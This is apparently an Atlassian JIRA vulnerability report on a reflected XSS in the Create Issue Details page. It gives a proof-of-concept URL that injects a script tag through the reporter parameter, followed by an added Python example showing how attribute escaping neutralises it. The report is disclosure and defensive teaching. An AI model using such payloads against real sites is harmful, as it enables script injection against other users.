Reflected XSS in Create Issue Details page

2012-10-10T01:10:23
ID ATLASSIAN:JRA-30039
Type atlassian
Reporter kburnett
Modified 2017-02-20T04:47:42

Description

The Create Issue Details page is vulnerable to reflected XSS.

  1. Log in to https://$JIRA/
  2. Visit https://$JIRA/secure/CreateIssueDetails.jspa?reporter="><script>alert('XSS')<%2Fscript><p+name%3D"&pid=10000&issuetype=2
  3. Accept the XSRF token warning

For example, https://volcano.jira-dev.com/secure/CreateIssueDetails.jspa?reporter="><script>alert('XSS')<%2Fscript><p+name%3D"&pid=10000&issuetype=2
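
Added example (not part of the original report and not Atlassian's code): why the reporter value in step 2 ends up as live markup, and how escaping for the attribute context keeps it inert. It assumes the page echoes reporter into a double-quoted HTML attribute, which the leading "> of the payload suggests; the template markup, the jira.example host and all function names are constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# URL from step 2 of the report; the host is a constructed placeholder.
REPORT_URL = ("https://jira.example/secure/CreateIssueDetails.jspa"
              "?reporter=\"><script>alert('XSS')<%2Fscript><p+name%3D\""
              "&pid=10000&issuetype=2")

# Assumed markup: the page is taken to echo `reporter` into a double-quoted
# attribute. This template is hypothetical, not JIRA's actual source.
TEMPLATE = '<input type="text" name="reporter" value="{}">'


def reporter_param(url):
    """Percent-decode the reporter parameter as the server would see it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["reporter"][0]


def render_unescaped(value):
    """Vulnerable pattern: raw request data placed inside the attribute."""
    return TEMPLATE.format(value)


def render_escaped(value):
    """Hardened pattern: HTML-escape, quotes included, for attribute context."""
    return TEMPLATE.format(escape(value, quote=True))


class _StartTags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def start_tags(markup):
    """Return (tag, attributes) for every element the markup opens."""
    parser = _StartTags()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    payload = reporter_param(REPORT_URL)
    for render in (render_unescaped, render_escaped):
        print(render.__name__, [t for t, _ in start_tags(render(payload))])
```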